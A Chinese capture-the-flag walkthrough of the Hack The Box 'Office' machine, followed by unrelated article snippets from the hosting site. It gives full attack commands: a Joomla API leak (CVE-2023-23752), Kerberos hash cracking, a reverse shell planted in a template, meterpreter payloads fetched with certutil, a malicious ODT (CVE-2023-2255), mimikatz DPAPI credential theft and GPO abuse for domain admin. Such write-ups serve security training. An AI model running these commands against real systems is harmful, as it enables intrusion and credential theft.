htb_office

在这里插入图片描述

端口扫描

namp -sSVC 10.10.11.13

80,445

在这里插入图片描述

在这里插入图片描述

80端口

在这里插入图片描述

robots.txt

只有/administrator可以访问

在这里插入图片描述

Joomla

在这里插入图片描述

joomscan扫描

 joomscan --url http://10.10.11.3/    

版本为4.2.7,存在cve
在这里插入图片描述

CVE-2023-23752 Joomla未授权访问Rest API漏洞

访问路径

/api/index.php/v1/config/application?public=true

在这里插入图片描述

H0lOgrams4reTakIng0Ver754!

尝试登录445端口smb服务

./kerbrute_linux_386 userenum --dc 10.10.11.3 -d office.htb /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt

先收集下用户名

在这里插入图片描述

多次尝试后发现用户名是dwolfe

smbclient -L //10.10.11.3/ -U dwolfe%H0lOgrams4reTakIng0Ver754!

在这里插入图片描述

smbclient //10.10.11.3/SOC\ Analysis -U dwolfe%H0lOgrams4reTakIng0Ver754!

将网络包下载下来

在这里插入图片描述
用wireshark打开
过滤出来有两个kerberos流量包

第二个数据包有关键信息

Frame 1917: 323 bytes on wire (2584 bits), 323 bytes captured (2584 bits) on interface unknown, id 0
 Section number: 1
 Interface id: 0 (unknown)
 Interface name: unknown
 Encapsulation type: Ethernet (1)
 Arrival Time: May 7, 2023 20:57:21.409088000 EDT
 UTC Arrival Time: May 8, 2023 00:57:21.409088000 UTC
 Epoch Arrival Time: 1683507441.409088000
 [Time shift for this packet: 0.000000000 seconds]
 [Time delta from previous captured frame: 0.000000000 seconds]
 [Time delta from previous displayed frame: 0.120607000 seconds]
 [Time since reference or first frame: 7.803090000 seconds]
 Frame Number: 1917
 Frame Length: 323 bytes (2584 bits)
 Capture Length: 323 bytes (2584 bits)
 [Frame is marked: False]
 [Frame is ignored: False]
 [Protocols in frame: eth:ethertype:ip:tcp:kerberos]
 [Coloring Rule Name: TCP]
 [Coloring Rule String: tcp]
Ethernet II, Src: PCSSystemtec_a4:08:70 (08:00:27:a4:08:70), Dst: PCSSystemtec_34:d8:9e (08:00:27:34:d8:9e)
 Destination: PCSSystemtec_34:d8:9e (08:00:27:34:d8:9e)
 Address: PCSSystemtec_34:d8:9e (08:00:27:34:d8:9e)
 .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
 .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
 Source: PCSSystemtec_a4:08:70 (08:00:27:a4:08:70)
 Address: PCSSystemtec_a4:08:70 (08:00:27:a4:08:70)
 .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
 .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
 Type: IPv4 (0x0800)
Internet Protocol Version 4, Src: 10.250.0.41, Dst: 10.250.0.30
 0100 .... = Version: 4
 .... 0101 = Header Length: 20 bytes (5)
 Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
 0000 00.. = Differentiated Services Codepoint: Default (0)
 .... ..00 = Explicit Congestion Notification: Not ECN-Capable Transport (0)
 Total Length: 309
 Identification: 0x6fd1 (28625)
 010. .... = Flags: 0x2, Don't fragment
 0... .... = Reserved bit: Not set
 .1.. .... = Don't fragment: Set
 ..0. .... = More fragments: Not set
 ...0 0000 0000 0000 = Fragment Offset: 0
 Time to Live: 64
 Protocol: TCP (6)
 Header Checksum: 0xb3b7 [validation disabled]
 [Header checksum status: Unverified]
 Source Address: 10.250.0.41
 Destination Address: 10.250.0.30
Transmission Control Protocol, Src Port: 33550, Dst Port: 88, Seq: 1, Ack: 1, Len: 257
 Source Port: 33550
 Destination Port: 88
 [Stream index: 23]
 [Conversation completeness: Complete, WITH_DATA (63)]
 ..1. .... = RST: Present
 ...1 .... = FIN: Present
 .... 1... = Data: Present
 .... .1.. = ACK: Present
 .... ..1. = SYN-ACK: Present
 .... ...1 = SYN: Present
 [Completeness Flags: RFDASS]
 [TCP Segment Len: 257]
 Sequence Number: 1 (relative sequence number)
 Sequence Number (raw): 73981869
 [Next Sequence Number: 258 (relative sequence number)]
 Acknowledgment Number: 1 (relative ack number)
 Acknowledgment number (raw): 527117312
 1000 .... = Header Length: 32 bytes (8)
 Flags: 0x018 (PSH, ACK)
 000. .... .... = Reserved: Not set
 ...0 .... .... = Accurate ECN: Not set
 .... 0... .... = Congestion Window Reduced: Not set
 .... .0.. .... = ECN-Echo: Not set
 .... ..0. .... = Urgent: Not set
 .... ...1 .... = Acknowledgment: Set
 .... .... 1... = Push: Set
 .... .... .0.. = Reset: Not set
 .... .... ..0. = Syn: Not set
 .... .... ...0 = Fin: Not set
 [TCP Flags: ·······AP···]
 Window: 502
 [Calculated window size: 64256]
 [Window size scaling factor: 128]
 Checksum: 0x5431 [unverified]
 [Checksum Status: Unverified]
 Urgent Pointer: 0
 Options: (12 bytes), No-Operation (NOP), No-Operation (NOP), Timestamps
 TCP Option - No-Operation (NOP)
 Kind: No-Operation (1)
 TCP Option - No-Operation (NOP)
 Kind: No-Operation (1)
 TCP Option - Timestamps
 Kind: Time Stamp Option (8)
 Length: 10
 Timestamp value: 2838742891: TSval 2838742891, TSecr 3650590
 Timestamp echo reply: 3650590
 [Timestamps]
 [Time since first frame in this TCP stream: 0.000507000 seconds]
 [Time since previous frame in this TCP stream: 0.000000000 seconds]
 [SEQ/ACK analysis]
 [iRTT: 0.000507000 seconds]
 [Bytes in flight: 257]
 [Bytes sent since last PSH flag: 257]
 TCP payload (257 bytes)
 [PDU Size: 257]
Kerberos
 Record Mark: 253 bytes
 0... .... .... .... .... .... .... .... = Reserved: Not set
 .000 0000 0000 0000 0000 0000 1111 1101 = Record Length: 253
 as-req
 pvno: 5
 msg-type: krb-as-req (10)
 padata: 2 items
 PA-DATA pA-ENC-TIMESTAMP
 padata-type: pA-ENC-TIMESTAMP (2)
 padata-value: 3041a003020112a23a0438a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc
 etype: eTYPE-AES256-CTS-HMAC-SHA1-96 (18)
 cipher: **a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc**
 PA-DATA pA-PAC-REQUEST
 padata-type: pA-PAC-REQUEST (128)
 padata-value: 3005a0030101ff
 include-pac: True
 req-body
 Padding: 0
 kdc-options: 50800000
 0... .... = reserved: False
 .1.. .... = forwardable: True
 ..0. .... = forwarded: False
 ...1 .... = proxiable: True
 .... 0... = proxy: False
 .... .0.. = allow-postdate: False
 .... ..0. = postdated: False
 .... ...0 = unused7: False
 1... .... = renewable: True
 .0.. .... = unused9: False
 ..0. .... = unused10: False
 ...0 .... = opt-hardware-auth: False
 .... 0... = unused12: False
 .... .0.. = unused13: False
 .... ..0. = constrained-delegation: False
 .... ...0 = canonicalize: False
 0... .... = request-anonymous: False
 .0.. .... = unused17: False
 ..0. .... = unused18: False
 ...0 .... = unused19: False
 .... 0... = unused20: False
 .... .0.. = unused21: False
 .... ..0. = unused22: False
 .... ...0 = unused23: False
 0... .... = unused24: False
 .0.. .... = unused25: False
 ..0. .... = disable-transited-check: False
 ...0 .... = renewable-ok: False
 .... 0... = enc-tkt-in-skey: False
 .... .0.. = unused29: False
 .... ..0. = renew: False
 .... ...0 = validate: False
 cname
 name-type: kRB5-NT-PRINCIPAL (1)
 cname-string: 1 item
 CNameString: tstark
 realm: OFFICE.HTB
 sname
 name-type: kRB5-NT-PRINCIPAL (1)
 sname-string: 2 items
 SNameString: krbtgt
 SNameString: OFFICE.HTB
 till: May 8, 2023 20:57:21.000000000 EDT
 rtime: May 8, 2023 20:57:21.000000000 EDT
 nonce: 369478355
 etype: 1 item
 ENCTYPE: eTYPE-AES256-CTS-HMAC-SHA1-96 (18)

尝试使用hashcat破解

先看看用哪个模式

发现有9个,对应的etype不同

在这里插入图片描述

这里是18

在这里插入图片描述

分别是19700和19900

在这里插入图片描述

正好上面etype写了是aes256

选19700

$krb5tgs$18$user$realm$8efd91bb01cc69dd07e46009$7352410d6aafd72c64972a66058b02aa1c28ac580ba41137d5a170467f06f17faf5dfb3f95ecf4fad74821fdc7e63a3195573f45f962f86942cb24255e544ad8d05178d560f683a3f59ce94e82c8e724a3af0160be549b472dd83e6b80733ad349973885e9082617294c6cbbea92349671883eaf068d7f5dcfc0405d97fda27435082b82b24f3be27f06c19354bf32066933312c770424eb6143674756243c1bde78ee3294792dcc49008a1b54f32ec5d5695f899946d42a67ce2fb1c227cb1d2004c0

根据流量包里的数据,仿照格式得到如下密钥

在这里插入图片描述

$krb5tgs$18$tstark$OFFICE.HTB$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc
hashcat -m 19700 "$krb5tgs$18$tstark$OFFICE.HTB$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc"

报错

在这里插入图片描述

回头看了下,才发现19700是TGS-REP,但流量包是预身份认证的数据,应该用19900

= =(第一次用不太熟练)

$krb5pa$18$hashcat$HASHCATDOMAIN.COM$96c289009b05181bfd32062962740b1b1ce5f74eb12e0266cde74e81094661addab08c0c1a178882c91a0ed89ae4e0e68d2820b9cce69770

同样根据格式修改数据

$krb5pa$18$tstark$OFFICE.HTB$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc
hashcat.exe -m 19900 "$krb5pa$18$tstark$OFFICE.HTB$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc" rockyou.txt

在这里插入图片描述

playboy69

尝试登录joomla

tstark/playboy69 登录失败

逐个尝试刚刚kerbrute收集到的用户名

最后试出来是administrator/playboy69

在这里插入图片描述

熟门熟路

system->site templates

在这里插入图片描述

修改error.php为反弹shell代码

在这里插入图片描述

访问error.php

反弹

在这里插入图片描述

得到shell,但是只有web_account权限

在这里插入图片描述

因为有tstark用户的账号密码,尝试登录tstark用户

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.29 LPORT=4444 -f exe -o payload.exe

certutil -urlcache -split -f http://10.10.14.29:8888/RunasCs.exe
certutil -urlcache -split -f http://10.10.14.29:8888/payload.exe

RunasCs.exe tstark playboy69 payload.exe

得到tstark权限的shell
在这里插入图片描述

netstat -ano

开放了8083端口

在这里插入图片描述

转发出来

certutil -urlcache -split -f http://10.10.14.29:8888/chiselw.exe
chiselw.exe client 10.10.14.29:6150 R:8083:127.0.0.1:8083

在这里插入图片描述

访问

是一个上传职位申请的页面
在这里插入图片描述

发现上传文件有限制,但是可以上传odt文件

在这里插入图片描述

htb另一个靶场mailing里有做过这个

CVE-2023-2255

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.29 LPORT=3333 -f exe -o payload1.exe

certutil -urlcache -split -f http://10.10.14.29:8899/payload1.exe

python3 CVE-2023-2255.py --cmd  'C:\Users\Public\payload1.exe' --output pay2.odt

上传pay2.odt,稍等一会,就反弹回来了

在这里插入图片描述

在这里插入图片描述

下面都是跟着教程做的

DPAPI - Extracting Passwords | HackTricks | HackTricks

cmdkey /list

横向移动到HHogan

在这里插入图片描述

上传mimikatz

certutil -urlcache -split -f   http://10.10.14.29:8899/mimikatz.exe

vault::list

列出vault位置
(这一步不懂有啥用)
在这里插入图片描述
列出Credential Files(凭据文件)

dir /a:h C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\

在这里插入图片描述

列出主密钥
Master Keys

用于加密用户的 RSA 密钥的 DPAPI 密钥存储在目录下,其中 {SID} 是该用户的安全标识符。DPAPI
密钥与保护用户私钥的主密钥存储在同一文件中。它通常是 64 字节的随机数据。(请注意,此目录是受保护的,因此您不能使用 cmd 列出它,但可以从 PS 列出它)。%APPDATA%\Microsoft\Protect\{SID}``dir

powershell   Get-ChildItem C:\Users\ppotts\AppData\Roaming\Microsoft\Protect\

在这里插入图片描述

powershell Get-ChildItem -Hidden C:\Users\ppotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107  

在这里插入图片描述

解密用户的主密钥

dpapi::masterkey /in:"C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb" /rpc

在这里插入图片描述

使用用户解密的主密钥来解密凭据

dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4

在这里插入图片描述
得到密码
H4ppyFtW183#

netstat -ano

靶机开放5985端口,使用Evil-winrm远程连接

在这里插入图片描述

└─# evil-winrm -i 10.10.11.3 -u "hhogan" -p "H4ppyFtW183#"

使用BloodHound导出域间关联数据

bloodhound-python -c ALL -u tstark -p 'playboy69' -d office.htb -dc dc.office.htb -ns 10.10.11.3

在这里插入图片描述

导入本地bloodhound中查看,发现存在GPO Manager组(忘记截图了)

列出GPO组名

Get-GPO -All | Select-Object -ExpandProperty DisplayName

在这里插入图片描述

上传SharpGPOAbuse

利用用户对组策略对象 (GPO) 的编辑权限,以破坏由该 GPO 控制的对象。

certutil -urlcache -split -f http://10.10.14.29:8899/SharpGPOAbuse.exe

.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount HHogan --GPOName "Default Domain Controllers Policy"

添加HHogan为本地管理员组成员

在这里插入图片描述

Options required to add a new local admin:
–UserAccount
设置需要添加进本地管理员组中的账号名称。
–GPOName
存在安全漏洞的GPO名称。 样例:
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName “Vulnerable GPO”

更新组策略

gpupdate /force

查看administrators组用户成员

net localgroup administrators

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/691658.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

推荐系统三十六式学习笔记:原理篇.内容推荐05|从文本到用户画像有多远?

目录 从文本开始构建用户画像一、结构化文本1、TF-IDF2、TextRank3、内容分类:4、实体识别5、聚类6、词嵌入 二、标签选择1、卡方检验2、信息增益 总结 对于一个早期的推荐系统来说,基于内容推荐离不开用户构建一个初级的画像,这种初级的画像…

JAVA高级-反射与动态代理(十五)

观看尚硅谷视频做的视频笔记 一、高级-反射与动态代理(十四) 1、反射概述 1)java程序中,所有的对象都有两种类型:编译时类型,运行时类型,而很多时候对象的编译类型和运行时类型不一致。 此处…

数据库分库分表mycat

为啥要分库分表 IO瓶颈:热点数据太多,数据库缓存不足,产生大量磁盘IO,效率较低。 请求数据太多,带宽不够,网络IO瓶颈。 CPU瓶颈:排序、分组、连接查询、聚合统计等SQL会耗费大量的CPU资源&#…

pre-commit 慢

执行这个命令 pre-commit run --all-files 有时候会卡在Initializing environment for https://github.com/xxx那里,如下图: 这个情况可以这样复现: git clone gitgithub.com:TheKevJames/coveralls-python cd coveralls-python python3.1…

c# 学习 2

常量 转义字符 类型转换

关于python中的关键字参数

在python语言中存在两种传参方式: 第一种是按照先后顺序来传参,这种传参风格,称为“位置参数”这是各个编程语言中最普遍的方式。 关键字传参~按照形参的名字来进行传参! 如上图所示,在函数中使用关键字传参的最大作…

微服务开发与实战Day03

一、导入黑马商城项目 资料文档:Docs 1. 安装MySQL ①删除root目录下的mysql rm -rf mysql/ ②把课前资料里的mysql目录上传到root目录下 ③创建一个通用网络 docker network create hm-net ④使用下面的命令安装MySQL docker run -d \--name mysql \-p 330…

SpringCloud整合OpenFeign实现微服务间的通信

1. 前言 1.1 为什么要使用OpenFeign? 虽说RestTemplate 对HTTP封装后, 已经⽐直接使⽤HTTPClient简单⽅便很多, 但是还存在⼀些问题. 需要拼接URL, 灵活性⾼, 但是封装臃肿, URL复杂时, 容易出错. 代码可读性差, ⻛格不统⼀。 1.2 介绍一下微服务之间的通信方式 微…

高能来袭|联想拯救者携手《黑神话:悟空》玩转东方神话世界

从2020年首次发布实机演示视频以来,《黑神话:悟空》便在全球范围内获得了广泛关注,成为国产3A游戏的现象级爆款。6月,联想拯救者正式宣布成为《黑神话:悟空》全球官方合作伙伴,致力于共同革新国产游戏体验&…

独立游戏之路 -- TapTap广告收益损失和常见问题

一个操作带来的TapTap广告收益损失 一,收益损失1.1 广告入口1.2 损失对比二,常见问题2.1 有展现量没有预估收益 /eCPM 波动大?2.2 新建正式媒体找不到预约游戏2.3 聚合模式由于没有回传 oaid 无数据2.4 每日观看次数限制是否有限制一,收益损失 1.1 广告入口 TapTap广告联…

三端植物大战僵尸杂交版来了

Hi,好久不见,最近植物大战僵尸杂交版蛮火的 那今天苏音整理给大家三端的植物大战僵尸杂交版包括【苹果端、电脑端、安卓端】 想要下载的直接划到最下方即可下载。 植物大战僵尸,作为一款古老的单机游戏,近期随着B站一位UP主潜艇…

并查集进阶版

过关代码如下 #define _CRT_SECURE_NO_WARNINGS #include<bits/stdc.h> #include<unordered_set> using namespace std;int n, m; vector<int> edg[400005]; int a[400005], be[400005]; // a的作用就是存放要摧毁 int k; int fa[400005]; int daan[400005]…

k8s学习--kubernetes服务自动伸缩之水平收缩(pod副本收缩)HPA详细解释与案例应用

文章目录 前言HPA简介简单理解详细解释HPA 的工作原理监控系统负载模式HPA 的优势使用 HPA 的注意事项应用类型 应用环境1.metircs-server部署2.HPA演示示例&#xff08;1&#xff09;部署一个服务&#xff08;2&#xff09;创建HPA对象&#xff08;3&#xff09;执行压测 前言…

PXE、无人值守实验

PXE部署 [roottest2 ~]# systemctl stop firewalld [roottest2 ~]# setenforce 0一、部署tftp服务 [roottest2 ~]# yum -y install tftp-server.x86_64 xinetd.x86_64 [roottest2 ~]# systemctl start tftp [roottest2 ~]# systemctl enable tftp [roottest2 ~]# systemctl …

【Vue】练习-mutations的减法功能

文章目录 一、需求二、完整代码 一、需求 步骤 二、完整代码 Son1.vue <template><div class"box"><h2>Son1 子组件</h2>从vuex中获取的值: <label>{{ $store.state.count }}</label><br><button click"handleA…

【病理数据】svs格式数据解读

Openslide 病理图像通常以.svs格式存储在数据库中。要想使用python处理svs格式的图像&#xff0c;我们通常使用Openslide模块。 关于Openslide模块的安装详见这个博客&#xff1a; 【解决Error】ModuleNotFoundError: No module named ‘openslide‘ 病理图像数据结构 病理图…

(杂交版)植物大战僵尸

1.为什么我老是闪退&#xff1f; 答&#xff1a;主页控制台把“后台运行”点开&#xff0c;尽量避免全屏就会好很多。 2.哪里下载&#xff1f; 答&#xff1a;夸克https://pan.quark.cn/s/973efb326f81 3.为啥我没有14个卡槽&#xff1f; 答&#xff1a;冒险没打&#xff0c;怪…

Bio-Info 每日一题:Rosalind-04-Rabbits and Recurrence Relations

&#x1f389; 进入生物信息学的世界&#xff0c;与Rosalind一起探索吧&#xff01;&#x1f9ec; Rosalind是一个在线平台&#xff0c;专为学习和实践生物信息学而设计。该平台提供了一系列循序渐进的编程挑战&#xff0c;帮助用户从基础到高级掌握生物信息学知识。无论你是初…

xm文件怎么转换成mp3文件,亲测有效!附工具下载

朋友们&#xff0c;你们有没有遇到过喜马拉雅的.xm文件转成MP3格式的麻烦&#xff1f;别急&#xff0c;我这儿有个好消息告诉你&#xff0c;有个免费的转换工具&#xff0c;简单几步就能搞定&#xff0c;还能批量处理呢&#xff01; 咱们先聊聊这个数字音频的小困扰。喜马拉雅…

278 基于Matlab GUI的中重频PD雷达仿真系统

基于Matlab GUI的中重频PD雷达仿真系统。具有26页文档报告。仿真雷达信号的发射、传播、散射、接收、滤波、信号处理、数据处理的全部物理过程&#xff0c;因此应当实现对雷达发射机、天线、接收机、回波信号处理、数据处理的建模与仿真。程序已调通&#xff0c;可直接运行。 2…